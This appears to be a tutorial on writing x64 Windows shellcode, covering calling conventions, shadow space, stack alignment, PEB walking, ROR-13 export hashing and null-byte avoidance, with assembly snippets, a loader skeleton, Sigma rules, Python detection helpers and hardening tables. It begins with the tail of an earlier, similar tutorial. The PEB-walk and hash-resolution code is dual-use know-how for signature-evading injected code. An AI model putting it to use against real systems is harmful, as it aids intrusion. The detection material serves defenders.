title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF' # PROCESS_ALL_ACCESS (pre-Vista value)
      - '0x1410' # QUERY_LIMITED_INFORMATION | QUERY_INFORMATION | VM_READ
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists, the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.
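The Sigma sketch earlier in this section can be read as a plain predicate over event fields. The Python below is one possible reading of its logic for testing sample events offline. It assumes events arrive as dictionaries keyed by Sysmon field names and that matching is case-insensitive; it is not a substitute for a real Sigma backend.

```python
SELECTION_ACCESS = ("0x1f0fff", "0x1410", "0x1f1fff")
SELECTION_TARGETS = ("\\lsass.exe", "\\svchost.exe", "\\explorer.exe")
FILTER_SOURCES = ("\\msmpeng.exe", "\\mssense.exe")


def matches(event: dict) -> bool:
    """Evaluate 'selection and not filter_legit' for one Sysmon event dict."""
    if event.get("EventID") != 10:
        return False
    access = str(event.get("GrantedAccess", "")).lower()
    target = str(event.get("TargetImage", "")).lower()
    source = str(event.get("SourceImage", "")).lower()
    selected = (any(value in access for value in SELECTION_ACCESS)
                and target.endswith(SELECTION_TARGETS))
    filtered = source.endswith(FILTER_SOURCES)
    return selected and not filtered


# Hypothetical sample event for a quick check.
sample = {
    "EventID": 10,
    "GrantedAccess": "0x1410",
    "SourceImage": "C:\\Users\\analyst\\Downloads\\tool.exe",
    "TargetImage": "C:\\Windows\\System32\\lsass.exe",
}
print(matches(sample))
```

Replaying a few known-good and known-bad events through a predicate like this is a cheap way to catch an over-broad filter before the rule reaches production.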
Hardening:
| Mitigation | Effect |
|---|---|
| ACG (ProcessDynamicCodePolicy) | Forbids new executable pages; breaks VirtualAlloc(PAGE_EXECUTE_READWRITE) |
| DEP / NX | Hardware-enforced non-execute on data pages |
| CFG | Invalidates indirect calls to non-registered targets |
| HVCI | Hypervisor-enforced kernel code integrity |
| ASR rules | Block office/script children, untrusted USB execution, etc. |
| Restrict SeDebugPrivilege | Limits which accounts can open and write to other processes |

13. Tools for PIC Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg | Verify struct offsets (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY) | microsoft.com |
| NASM | Assemble x86/x64 PIC payloads in Intel syntax | nasm.us |
| x64dbg | Dynamic analysis of shellcode in a loader harness | x64dbg.com |
| Ghidra / IDA | Static disassembly of extracted opcodes | ghidra-sre.org |
| Process Hacker | Inspect process memory regions and protections | processhacker.sf.io |
| pe-sieve | Hunts injected, hollowed, or stomped modules | github.com/hasherezade/pe-sieve |
| Volatility 3 | malfind, ldrmodules, vadinfo for memory-resident PIC | volatilityfoundation.org |
| YARA | Signature ROR-13 loops, PEB-walk prologues, hash tables | virustotal.github.io/yara |
| SilkETW | Subscribe to THREATINT and Kernel-Process providers | github.com/mandiant/SilkETW |
14. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Reflective Code Loading | T1620 | Volatility malfind / ldrmodules; THREATINT ETW |
| Process Injection (parent) | T1055 | Sysmon EID 10 + EID 8; ETW THREATINT WriteVM/AllocVM |
| Process Injection: DLL | T1055.001 | Sysmon EID 7 from unusual paths; pe-sieve |
| Process Injection: APC | T1055.004 | Kernel-Process ETW thread events on alertable waits |
| Process Injection: Hollowing | T1055.012 | Sysmon EID 25 ProcessTampering; pe-sieve hollowing scan |
| Obfuscated Files or Information | T1027 | YARA on ROR-13 hash loops and stack-string push sequences |
| Command and Scripting Interpreter | T1059 | EID 4688 / Sysmon EID 1 with command-line auditing |
Summary
- Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
- The PEB → Ldr → InMemoryOrderModuleList chain reaches kernel32.dll in a handful of pointer dereferences without any string comparison.
- Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
- Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
- Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions, and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.
Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.
1. From x86 to x64: What Actually Changed
Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.
| Item | x86 | x64 |
|---|---|---|
| General-purpose registers | 8 × 32-bit (EAX…EDI) | 16 × 64-bit (RAX…R15) |
| Windows calling convention | stdcall / cdecl — all args on stack | Unified fast-call — first 4 integer args in registers |
| TEB segment register | FS; PEB at fs:[0x30] | GS; PEB at gs:[0x60] |
| Address width | 32-bit | 64-bit (48-bit canonical VA in practice) |
| call pushes | 4-byte return address | 8-byte return address |
| RIP-relative addressing | Not available | Available; lea rax, [rip + offset] is idiomatic in PIC |
Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.
2. The Microsoft x64 ABI Deep-Dive
The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.
| Argument # | Integer Register | Floating-Point Register |
|---|---|---|
| 1st | RCX | XMM0L |
| 2nd | RDX | XMM1L |
| 3rd | R8 | XMM2L |
| 4th | R9 | XMM3L |
| 5th+ | Stack (above shadow space) | Stack |
The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.
Volatile vs Non-Volatile Registers
| Class | Registers |
|---|---|
| Volatile | RAX, RCX, RDX, R8, R9, R10, R11, XMM0–XMM5 |
| Non-volatile | RBX, RBP, RDI, RSI, RSP, R12, R13, R14, R15, XMM6–XMM15 |
A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.
Side-by-Side: x86 Push vs x64 Register Load
; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0 ; uType
push title ; lpCaption
push msg ; lpText
push 0 ; hWnd
call [MessageBoxA] ; callee cleans the stack
; --- x64 fastcall: same call ---
xor rcx, rcx ; hWnd = NULL
lea rdx, [rel msg] ; lpText
lea r8, [rel title] ; lpCaption
xor r9d, r9d ; uType = 0
sub rsp, 0x28 ; shadow space + alignment (see §4)
call [rel MessageBoxA]
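add rsp, 0x28

Note xor r9d, r9d rather than xor r9, r9: writing to the 32-bit sub-register zero-extends to the full 64-bit register. For R8–R15 both forms are three bytes, because a REX prefix is needed either way. The size saving applies to the legacy registers, where xor ecx, ecx (31 C9) is one byte shorter than xor rcx, rcx (48 31 C9).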

3. Shadow Space: Why, What, and Where
In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.
Critical points:
- Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
- It is owned by the caller. The callee may overwrite it without saving the previous contents.
- The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
- Stack arguments beyond the fourth begin at [RSP + 0x28] (32 bytes shadow + 8 bytes return address).
| Layout immediately after call, before callee prologue | Offset from RSP |
|---|---|
| Return address (pushed by call) | [RSP + 0x00] |
| Shadow slot for RCX | [RSP + 0x08] |
| Shadow slot for RDX | [RSP + 0x10] |
| Shadow slot for R8 | [RSP + 0x18] |
| Shadow slot for R9 | [RSP + 0x20] |
| 5th argument (if any) | [RSP + 0x28] |
Skip the shadow allocation and the first thing the callee does, often a mov [rsp+8], rcx early in a Win32 prologue, clobbers whatever sits just above the return address: your own locals, your stack strings, or, worse, the saved return address your shellcode needs to get back to its host.
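The layout table reduces to a little arithmetic. The sketch below, with hypothetical helper names, computes where the callee finds integer argument n on entry and where the home slot for each register argument lives, using the offsets from the table.

```python
INT_ARG_REGS = ("RCX", "RDX", "R8", "R9")
RETURN_ADDRESS = 8   # bytes pushed by call
SHADOW_SPACE = 32    # four 8-byte home slots


def arg_location(n: int) -> str:
    """Where the callee finds integer argument n (1-based) on entry."""
    if n < 1:
        raise ValueError("arguments are numbered from 1")
    if n <= 4:
        return INT_ARG_REGS[n - 1]
    offset = RETURN_ADDRESS + SHADOW_SPACE + 8 * (n - 5)
    return f"[RSP + 0x{offset:02X}]"


def home_slot(n: int) -> str:
    """Shadow slot the callee may use to spill register argument n (1 to 4)."""
    if not 1 <= n <= 4:
        raise ValueError("only the first four arguments have home slots")
    return f"[RSP + 0x{RETURN_ADDRESS + 8 * (n - 1):02X}]"


for n in range(1, 7):
    print(n, arg_location(n))
```

The fifth argument lands at 0x28 precisely because the return address and the four home slots sit below it, whether or not the callee ever uses those slots.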

4. Stack Alignment in Practice
The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.
This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:
- 0x20 (32 bytes) for shadow space.
- + 0x08 to undo the misalignment the preceding call introduced.
; Canonical shellcode call wrapper
sub rsp, 0x28 ; 32B shadow + 8B realign
call rax ; rax = resolved API address
add rsp, 0x28

When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:
; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0 ; force 16-byte alignment
sub rsp, 0x20 ; shadow space only: RSP is already aligned, so no extra 8

To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, the adjustment is off by 8: either the + 0x08 was forgotten after a call-style entry, or it was added on top of an explicit and-alignment.
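The two cases are easy to confuse, so here is the arithmetic spelled out. The sketch models RSP as a plain integer. The starting value is a hypothetical stack pointer of the form 16N + 8, which is what a routine sees when it was entered by a call.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF


def is_call_aligned(rsp: int) -> bool:
    """The ABI wants RSP to be a multiple of 16 at the moment of a call."""
    return rsp % 16 == 0


def after_call_entry(rsp_on_entry: int, reserve: int) -> int:
    """Entered via call (RSP = 16N + 8): just subtract the reservation."""
    return (rsp_on_entry - reserve) & MASK64


def after_forced_alignment(rsp_on_entry: int, reserve: int) -> int:
    """Entered from unknown context: and-align first, then subtract."""
    aligned = rsp_on_entry & 0xFFFFFFFFFFFFFFF0
    return (aligned - reserve) & MASK64


entry = 0x14FF08  # hypothetical RSP on entry, 16N + 8

for label, rsp in (
    ("call entry, sub 0x28", after_call_entry(entry, 0x28)),
    ("call entry, sub 0x20", after_call_entry(entry, 0x20)),
    ("and-align,  sub 0x20", after_forced_alignment(entry, 0x20)),
    ("and-align,  sub 0x28", after_forced_alignment(entry, 0x28)),
):
    print(f"{label}: rsp=0x{rsp:X} aligned={is_call_aligned(rsp)}")
```

The extra 8 only belongs in the reservation when RSP starts at 16N + 8. After an explicit and-alignment the same extra 8 is what breaks the alignment.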
5. Position-Independent Code Fundamentals
Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:
- RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
- call/pop delta trick. A call to the next instruction pushes its return address, which is the runtime location of the following label. The callee pops it into a register to obtain a base for subsequent offsets.
; Obtain the runtime address of `data` without RIP-relative encoding
call get_rip
get_rip:
pop rbx ; rbx = runtime address of get_rip (this instruction)
lea rsi, [rbx + data - get_rip]
jmp continue
data:
db "kernel32.dll", 0
continue:

In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder demands it (for example, to avoid certain bad bytes).
6. PEB Walking: Finding kernel32.dll Without Imports
Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:
| Step | Source | Field | Offset (x64) |
|---|---|---|---|
| 1 | GS segment | → TEB | — |
| 2 | TEB | ProcessEnvironmentBlock | +0x060 |
| 3 | PEB | Ldr → PEB_LDR_DATA | +0x018 |
| 4 | PEB_LDR_DATA | InMemoryOrderModuleList | +0x020 |
| 5 | LDR_DATA_TABLE_ENTRY link | InMemoryOrderLinks.Flink | +0x000 |
| 6 | LDR_DATA_TABLE_ENTRY | DllBase (relative to the InMemoryOrderLinks pointer; +0x030 from the start of the entry) | +0x020 |
The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. Following Flink twice from the first entry reaches the kernel32.dll entry. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because EDRs deliberately permute the head of the list as a tripwire (see §10).
; --- PEB walk skeleton: locate kernel32.dll base in rax ---
xor eax, eax
mov rbx, [gs:0x60] ; TEB -> PEB
mov rbx, [rbx + 0x18] ; PEB -> Ldr (PEB_LDR_DATA)
mov rbx, [rbx + 0x20] ; -> InMemoryOrderModuleList.Flink
; (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
mov rbx, [rbx] ; advance: -> 2nd entry (ntdll)
mov rbx, [rbx] ; advance: -> 3rd entry (kernel32)
mov rax, [rbx + 0x20] ; DllBase: entry +0x30, minus the 0x10 offset of InMemoryOrderLinks
; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:
0:000> dt ntdll!_TEB ProcessEnvironmentBlock
0:000> dt ntdll!_PEB Ldr
0:000> dt ntdll!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt ntdll!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32
7. Parsing the Export Address Table
With kernel32.dll’s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial signatures and to remove embedded nulls.
Key offsets from a loaded module base:
| Field | Offset |
|---|---|
| e_lfanew (RVA of PE header) | DllBase + 0x3C |
| Optional Header | PE_header + 0x18 |
| Export Directory RVA (PE32+) | OptHeader + 0x70 |
| AddressOfFunctions | ExportDir + 0x1C |
| AddressOfNames | ExportDir + 0x20 |
| AddressOfNameOrdinals | ExportDir + 0x24 |
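When analysing a sample or checking a DLL on disk, the same offsets can be read with Python's struct module. The following is a minimal sketch, not a full PE parser: the helper name export_directory_rva is hypothetical, it assumes a well-formed image, and it returns only the RVA without mapping it to a file offset.

```python
import struct


def export_directory_rva(image: bytes) -> int:
    """Return the Export Directory RVA using the header offsets in the table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    # e_lfanew lives at offset 0x3C of the DOS header.
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # Optional header starts 0x18 bytes after the PE signature.
    opt_header = e_lfanew + 0x18
    (magic,) = struct.unpack_from("<H", image, opt_header)
    if magic == 0x20B:      # PE32+ (64-bit): data directories at +0x70
        data_dir = opt_header + 0x70
    elif magic == 0x10B:    # PE32 (32-bit): data directories at +0x60
        data_dir = opt_header + 0x60
    else:
        raise ValueError(f"unexpected optional header magic 0x{magic:x}")
    # The first data directory entry is the export directory (RVA, then size).
    (rva,) = struct.unpack_from("<I", image, data_dir)
    return rva
```

For a PE32+ image the value is read from PE_header + 0x88, which is the same displacement the assembly outline uses.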
; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)
mov ecx, [rax + 0x3C] ; e_lfanew
add rcx, rax ; rcx = PE header
mov edx, [rcx + 0x88] ; Export Directory RVA (OptHdr + 0x70)
add rdx, rax ; rdx = IMAGE_EXPORT_DIRECTORY
mov r8d, [rdx + 0x18] ; NumberOfNames
mov r9d, [rdx + 0x20] ; AddressOfNames RVA
add r9, rax
xor r10, r10 ; index
.next_name:
mov esi, [r9 + r10*4] ; name RVA
add rsi, rax ; rsi -> ASCII export name
xor edi, edi ; hash accumulator
.hash_byte:
movzx r11d, byte [rsi] ; next name byte (scratch register, so rax keeps the module base)
test r11b, r11b
jz .check
ror edi, 13
add edi, r11d
inc rsi
jmp .hash_byte
.check:
cmp edi, ebp ; compare ROR-13 hash
je .found
inc r10
cmp r10d, r8d
jb .next_name
xor rax, rax ; not found
ret
.found:
; resolve via AddressOfNameOrdinals + AddressOfFunctions
; (omitted for brevity)
ret
The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard, which is precisely why defenders now key on it (see §11).
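For building detection content or checking a constant recovered from a sample, the hash loop above can be mirrored in a few lines of Python. This is a sketch of the plain rotate-and-add variant shown in the outline (case-sensitive, terminator not hashed); the function names are hypothetical, and frameworks may use variants that produce different values.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Rotate-right-13 then add each byte, matching the .hash_byte loop."""
    h = 0
    for byte in name.encode("ascii"):
        h = ror32(h, 13)
        h = (h + byte) & 0xFFFFFFFF
    return h


if __name__ == "__main__":
    for export in ("GetProcAddress", "LoadLibraryA"):
        print(f"{export}: 0x{ror13_hash(export):08X}")
```

Running it against a module's export names gives a lookup table for mapping hash constants in a sample back to API names.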
8. Null-Byte and Bad-Character Avoidance
Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.
| Problem | Fix |
|---|---|
| mov rax, 0x000000007FFE1234 → nulls | xor eax, eax then mov eax, 0x7FFE1234 (zero-extends) |
| 64-bit literal in mov r9, imm64 | lea r9, [rel label] or build via shifts/ORs |
| push 0 → encodes 6A 00 | xor rcx, rcx ; push rcx |
| mov rcx, 0 → immediate encodes four null bytes | xor ecx, ecx |
; --- Null-byte comparison ---
; BAD: mov rax, 0x76ab1234
; 48 B8 34 12 AB 76 00 00 00 00 <-- four null bytes
mov rax, 0x76ab1234
; GOOD: zero-extend via 32-bit sub-register
; 31 C0 <-- xor eax, eax
; B8 34 12 AB 76 <-- mov eax, 0x76AB1234
xor eax, eax
mov eax, 0x76ab1234
Writing to EAX implicitly zeroes the upper 32 bits of RAX; this single architectural quirk eliminates most accidental nulls in shellcode constants.
A short Python lab to validate a candidate snippet:
from keystone import Ks, KS_ARCH_X86, KS_MODE_64
asm = b"""
xor eax, eax
mov eax, 0x76ab1234
mov rbx, qword ptr gs:[0x60]
mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")
Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.
9. Shellcode Skeleton: Putting It Together
The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.
[BITS 64]
_start:
; --- entry: defensively align stack ---
and rsp, 0xFFFFFFFFFFFFFFF0 ; rsp is now 16-byte aligned
sub rsp, 0x20 ; 32-byte shadow space; a multiple of 16 keeps the alignment
; --- locate kernel32.dll via PEB ---
mov rbx, [gs:0x60] ; TEB -> PEB
mov rbx, [rbx + 0x18] ; PEB -> Ldr
mov rbx, [rbx + 0x20] ; InMemoryOrderModuleList.Flink
mov rbx, [rbx] ; -> ntdll entry
mov rbx, [rbx] ; -> kernel32 entry
mov r15, [rbx + 0x20] ; r15 = kernel32 base (DllBase, relative to InMemoryOrderLinks)
; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
mov rcx, r15
mov edx, 0x7C0DFCAA ; ROR-13("GetProcAddress") (illustrative)
call eat_lookup ; rax = &GetProcAddress
mov r14, rax
; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
mov rcx, r15 ; hModule = kernel32
lea rdx, [rel s_LoadLibraryA]
call r14 ; rax = &LoadLibraryA
lea rcx, [rel s_user32]
call rax ; rax = HMODULE user32
; --- ... continue resolution and API calls ...
add rsp, 0x20
ret
s_LoadLibraryA: db "LoadLibraryA", 0
s_user32: db "user32.dll", 0
; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
; (see §7 for the inner loop)
ret
Every block in the skeleton corresponds to one of the rules established above: and rsp followed by sub rsp, 0x20 for alignment plus shadow space (the sub rsp, 0x28 form applies inside a function entered by call, where the pushed return address has already offset rsp by 8), gs:[0x60] for the PEB, [rbx + 0x20] for DllBase, lea + RIP-relative strings for PIC, and r14 / r15 carrying non-volatile state across calls without manual save/restore.
10. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB-walk API resolution | Locate kernel32.dll via gs:[0x60] chain, parse exports by hash |
| ROR-13 export hashing | Avoid embedded API name strings; survive static signature scans |
| RIP-relative PIC | lea reg, [rel label] to address embedded data without fixups |
| Sub-register zero-extension | mov eax, imm32 to write RAX with no null bytes |
| Shadow-space-aware call wrapping | sub rsp, 0x28 around every Win32 call from an unknown caller |
| Direct Win32 → Native API substitution | Call Nt* syscalls to bypass usermode hooks (T1106) |
| Reflective loading of a PE in memory | Shellcode bootstraps a full PE image without touching disk (T1620) |
11. Defensive Strategies & Detection
Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.
Sysmon events to enable and triage:
- EventID 1: Process Create. Unusual parent/child chains (browser, Office, mail client spawning cmd.exe / powershell.exe) are the cheapest, highest-yield signal.
- EventID 8: CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.
- EventID 10: ProcessAccess. Watch GrantedAccess masks like 0x1FFFFF (full access) and 0x1010 (query-limited-information + VM-read).
- EventID 17 / 18: Pipe creation/connection, frequently used by shellcode-launched implants for C2.
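GrantedAccess values are easier to triage once they are expanded into the individual rights they contain. The sketch below assumes the standard process access-right constants from the Windows SDK; the helper name decode_granted_access is hypothetical and the table covers only the commonly seen bits.

```python
from typing import List, Union

# Process-specific and standard access rights (values from the Windows SDK headers).
PROCESS_RIGHTS = {
    0x000001: "PROCESS_TERMINATE",
    0x000002: "PROCESS_CREATE_THREAD",
    0x000008: "PROCESS_VM_OPERATION",
    0x000010: "PROCESS_VM_READ",
    0x000020: "PROCESS_VM_WRITE",
    0x000040: "PROCESS_DUP_HANDLE",
    0x000080: "PROCESS_CREATE_PROCESS",
    0x000100: "PROCESS_SET_QUOTA",
    0x000200: "PROCESS_SET_INFORMATION",
    0x000400: "PROCESS_QUERY_INFORMATION",
    0x000800: "PROCESS_SUSPEND_RESUME",
    0x001000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x010000: "DELETE",
    0x020000: "READ_CONTROL",
    0x040000: "WRITE_DAC",
    0x080000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE",
}


def decode_granted_access(mask: Union[int, str]) -> List[str]:
    """Expand a Sysmon GrantedAccess value (int or '0x...' string) into right names."""
    if isinstance(mask, str):
        mask = int(mask, 16)
    return [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]


if __name__ == "__main__":
    for value in ("0x1010", "0x1410", "0x147a", "0x1FFFFF"):
        print(value, decode_granted_access(value))
```

Decoding makes it obvious which masks only read memory and which also carry PROCESS_VM_WRITE or PROCESS_CREATE_THREAD, the rights an injection chain needs.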
ETW providers worth subscribing to in EDR pipelines:
- Microsoft-Windows-Kernel-Process: kernel-side process/thread/image events.
- Microsoft-Windows-Threat-Intelligence (PPL-only): NtAllocateVirtualMemory, NtProtectVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx observed at the syscall layer, so patching user-mode hooks does not bypass it.
- Microsoft-Windows-Security-Auditing: handle and object access.
Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.
Behavioural signals defenders should hunt on:
- Threads with StartAddress in MEM_PRIVATE regions that are PAGE_EXECUTE_* and not backed by a file image.
- CallTrace containing UNKNOWN frames: the calling instruction lives in unbacked memory.
- gs:[0x60] opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.
- ROR-13 hashing loops in memory scans.
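The opcode-pattern hunt in the list above can be prototyped against a dumped memory region before it is turned into a YARA rule. This is a rough sketch under stated assumptions: the helper name find_peb_reads is hypothetical, it only matches the REX.W form that loads into RAX through RDI, and a hit is a lead to triage rather than proof of shellcode.

```python
import re
from typing import List

# 65 48 8B /r 25 60 00 00 00  ==  mov r64, gs:[0x60]
# The ModRM byte selects the destination register: 04=rax, 0c=rcx, 14=rdx,
# 1c=rbx, 24=rsp, 2c=rbp, 34=rsi, 3c=rdi.
_PEB_READ = re.compile(
    rb"\x65\x48\x8b[\x04\x0c\x14\x1c\x24\x2c\x34\x3c]\x25\x60\x00\x00\x00"
)


def find_peb_reads(region: bytes) -> List[int]:
    """Return the offsets of every gs:[0x60] load found in a memory region."""
    return [match.start() for match in _PEB_READ.finditer(region)]


if __name__ == "__main__":
    # Four NOPs, then mov rbx, gs:[0x60], then ret.
    sample = b"\x90" * 4 + bytes.fromhex("65488b1c2560000000") + b"\xc3"
    print(find_peb_reads(sample))
```

Pairing each hit with the region's protection and backing file (private, executable, no image) keeps the false-positive rate manageable.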
Sigma sketch — suspicious cross-process access typical of shellcode injection:
title: Suspicious Cross-Process Access With Memory Read/Write Rights
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1FFFFF'
      - '0x1410'
      - '0x1010'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\WmiPrvSE.exe'
  condition: selection and not filter_legit
level: high
Hardening to deploy on monitored endpoints:
- Arbitrary Code Guard (ACG): denies the PAGE_EXECUTE_* transition that turns a MEM_PRIVATE shellcode buffer into runnable code.
- Control Flow Guard (CFG): invalidates indirect calls into unregistered targets, which shellcode entry points usually are.
- Block Win32 API calls from Office macros / child processes: Attack Surface Reduction rules that sever the most common shellcode delivery vector.
- PPL-protected EDR with kernel ETW Ti subscription: preserves syscall-layer telemetry even when userland hooks are patched out.
A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.
12. Tools for x64 Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| NASM | Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection | nasm.us |
| Keystone Engine | Programmatic assembler (Python bindings) for bad-character analysis labs | keystone-engine.org |
| x64dbg | User-mode debugger; trace shellcode through gs:[0x60] and EAT walks | x64dbg.com |
| WinDbg | Inspect _TEB, _PEB, _PEB_LDR_DATA, _LDR_DATA_TABLE_ENTRY on the target build | learn.microsoft.com |
| Ghidra / IDA | Static analysis of shellcode-bearing samples and reflective loader stubs | ghidra-sre.org |
| Volatility 3 | Memory forensics: enumerate suspicious MEM_PRIVATE + RX regions, hunt unbacked threads | volatilityfoundation.org |
| Process Hacker | Live triage of thread start addresses and memory protections | processhacker.sourceforge.io |
| Godbolt Compiler Explorer | Inspect MSVC-emitted x64 prologues to confirm ABI assumptions | godbolt.org |
13. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Process Injection (umbrella) | T1055 | Sysmon EventID 8 + EventID 10 with VM-write GrantedAccess |
| DLL Injection | T1055.001 | Image Load (EventID 7) from MEM_PRIVATE-allocated path |
| Portable Executable Injection | T1055.002 | Volatility scans for PE headers in MEM_PRIVATE RX regions |
| APC Injection | T1055.004 | ETW Ti NtQueueApcThread to remote thread; alerted thread-start addresses |
| Process Hollowing | T1055.012 | EventID 1 with suspended child, followed by EventID 10 write + resume |
| Native API | T1106 | ETW Ti syscall provider; direct Nt* calls outside ntdll |
| Obfuscated Files or Information | T1027 | YARA on ROR-13 loops; entropy heuristics on dropped payloads |
| Reflective Code Loading | T1620 | Unbacked RX memory with PE magic / no module image record |
Summary
- x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
